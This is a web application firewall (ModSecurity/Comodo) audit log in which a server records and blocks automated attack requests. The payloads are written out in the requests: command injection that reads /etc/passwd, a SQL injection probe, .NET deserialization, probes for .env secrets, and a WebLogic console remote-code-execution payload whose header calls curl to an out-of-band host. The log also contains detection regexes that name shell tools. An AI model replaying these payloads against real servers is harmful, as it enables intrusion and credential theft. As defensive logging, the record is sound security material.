Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b937f27-Z-- --70c79062-A-- [03/Jun/2025:13:16:35 +0700] aD6TQ0SujXvW2xVCZlWUgQAAABI 103.236.140.4 55262 103.236.140.4 8181 --70c79062-B-- POST /xmlpserver/ReportTemplateService.xls HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 94 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: text/xml; charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171818931 --70c79062-C-- --70c79062-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --70c79062-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748931395046058 5065 (- - -) Stopwatch2: 1748931395046058 5065; combined=3665, p1=436, p2=3129, p3=35, p4=34, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70c79062-Z-- --df80b066-A-- [03/Jun/2025:13:16:35 +0700] aD6TQ0SujXvW2xVCZlWUggAAAAw 103.236.140.4 55266 103.236.140.4 8181 --df80b066-B-- POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 8004 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/120.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171908910 --df80b066-C-- stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%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%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%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%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e --df80b066-F-- HTTP/1.1 403 Forbidden X-Frame-Options: 
SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df80b066-E-- --df80b066-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)((?:\\bx(?:link:href|html|mlns)|!ENTITY\\b.{0,399}?\\b(?:SYSTEM|PUBLIC)|\\bdata:text\\/html))" at ARGS:stagingTaskData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "170"] [id "213060"] [rev "7"] [msg "COMODO WAF: XSS Filter - Category 3: Attribute Vector||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748931395065071 14784 (- - -) Stopwatch2: 1748931395065071 14784; combined=13539, p1=386, p2=13126, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df80b066-Z-- --6fd7a762-A-- [03/Jun/2025:13:16:35 +0700] aD6TQ5AN5Lj366RdGMyYDgAAAM0 103.236.140.4 55274 103.236.140.4 8181 --6fd7a762-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 16 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171908913 --6fd7a762-C-- whatever-content --6fd7a762-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fd7a762-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. 
Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748931395082386 5557 (- - -) Stopwatch2: 1748931395082386 5557; combined=4065, p1=365, p2=3622, p3=21, p4=24, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fd7a762-Z-- --809f4346-A-- [03/Jun/2025:13:16:36 +0700] aD6TRESujXvW2xVCZlWUhQAAABY 103.236.140.4 55298 103.236.140.4 8181 --809f4346-B-- POST /password_change.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 73 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171908922 --809f4346-C-- user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 --809f4346-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --809f4346-E-- --809f4346-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /password_change.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748931396061900 1892 (- - -) Stopwatch2: 1748931396061900 1892; combined=594, p1=390, p2=175, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --809f4346-Z-- --06ea6d32-A-- [03/Jun/2025:13:16:40 +0700] aD6TSESujXvW2xVCZlWUkQAAABA 103.236.140.4 55366 103.236.140.4 8181 --06ea6d32-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 171908948 --06ea6d32-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --06ea6d32-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748931400064851 3065 (- - -) Stopwatch2: 1748931400064851 3065; combined=1345, p1=577, p2=740, p3=0, p4=0, p5=28, sr=171, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06ea6d32-Z-- --facef360-A-- [03/Jun/2025:13:16:42 +0700] aD6TSkSujXvW2xVCZlWUlQAAAAE 103.236.140.4 55400 103.236.140.4 8181 --facef360-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 171420160 --facef360-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --facef360-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748931402087899 3303 (- - -) Stopwatch2: 1748931402087899 3303; combined=1675, p1=452, p2=1194, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --facef360-Z-- --4ac55b22-A-- [03/Jun/2025:13:18:56 +0700] aD6T0I0G58RZMmoh8H3vlgAAAIA 103.236.140.4 57116 103.236.140.4 8181 --4ac55b22-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 167.172.232.142 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 167.172.232.142 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --4ac55b22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ac55b22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748931536319160 826 (- - -) Stopwatch2: 1748931536319160 826; combined=317, p1=279, p2=0, p3=0, p4=0, p5=38, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ac55b22-Z-- --dd8e4115-A-- [03/Jun/2025:13:30:35 +0700] aD6WiwhM7ynDNybXsoN_kgAAAEQ 103.236.140.4 37674 103.236.140.4 8181 --dd8e4115-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 157.245.105.107 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 157.245.105.107 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --dd8e4115-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd8e4115-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748932235234435 750 (- - -) Stopwatch2: 1748932235234435 750; combined=298, p1=261, p2=0, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd8e4115-Z-- --02c2614f-A-- [03/Jun/2025:13:45:18 +0700] aD6Z_pAN5Lj366RdGMyeFAAAAMg 103.236.140.4 48790 103.236.140.4 8181 --02c2614f-B-- GET /vendor/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 Accept-Charset: utf-8 --02c2614f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02c2614f-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748933118156317 876 (- - -) Stopwatch2: 1748933118156317 876; combined=358, p1=319, p2=0, p3=0, p4=0, p5=39, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02c2614f-Z-- --446f7d41-A-- [03/Jun/2025:15:11:32 +0700] aD6uNI0G58RZMmoh8H0q3AAAAIk 103.236.140.4 40486 103.236.140.4 8181 --446f7d41-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172017062 --446f7d41-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --446f7d41-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --446f7d41-E-- --446f7d41-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748938292230041 4002 (- - -) Stopwatch2: 1748938292230041 4002; combined=2319, p1=512, p2=1778, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --446f7d41-Z-- --35d57625-A-- [03/Jun/2025:15:16:58 +0700] aD6vepAN5Lj366RdGMzfQQAAAMg 103.236.140.4 60960 103.236.140.4 8181 --35d57625-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: uid=1234123 X-Varnish: 172050415 --35d57625-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --35d57625-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35d57625-E-- --35d57625-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748938618056293 1824 (- - -) Stopwatch2: 1748938618056293 1824; combined=631, p1=399, p2=204, p3=0, p4=0, p5=28, sr=63, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35d57625-Z-- --dc58d771-A-- [03/Jun/2025:15:32:19 +0700] aD6zE0SujXvW2xVCZlXzjQAAAAU 103.236.140.4 34254 103.236.140.4 8181 --dc58d771-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 46.101.123.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 46.101.123.232 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --dc58d771-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc58d771-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748939539145361 824 (- - -) Stopwatch2: 1748939539145361 824; combined=328, p1=285, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc58d771-Z-- --3968db20-A-- [03/Jun/2025:15:47:55 +0700] aD62u0SujXvW2xVCZlUGCQAAAAg 103.236.140.4 36008 103.236.140.4 8181 --3968db20-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 Accept-Charset: utf-8 --3968db20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3968db20-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748940475341326 751 (- - -) Stopwatch2: 1748940475341326 751; combined=284, p1=248, p2=0, p3=0, p4=0, p5=36, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3968db20-Z-- --a75cb422-A-- [03/Jun/2025:16:34:46 +0700] aD7BtghM7ynDNybXsoMgUgAAAEc 103.236.140.4 53918 103.236.140.4 8181 --a75cb422-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 Accept-Charset: utf-8 --a75cb422-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a75cb422-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748943286033709 808 (- - -) Stopwatch2: 1748943286033709 808; combined=347, p1=311, p2=0, p3=0, p4=0, p5=35, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a75cb422-Z-- --32f0fa77-A-- [03/Jun/2025:16:58:31 +0700] aD7HR0SujXvW2xVCZlV9HAAAAAE 103.236.140.4 53278 103.236.140.4 8181 --32f0fa77-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 1258 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0us2vpgpeonc6qdbef0mszk1tsdkirmt.oast.me X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171296088 --32f0fa77-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? 
new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --32f0fa77-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32f0fa77-E-- --32f0fa77-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() 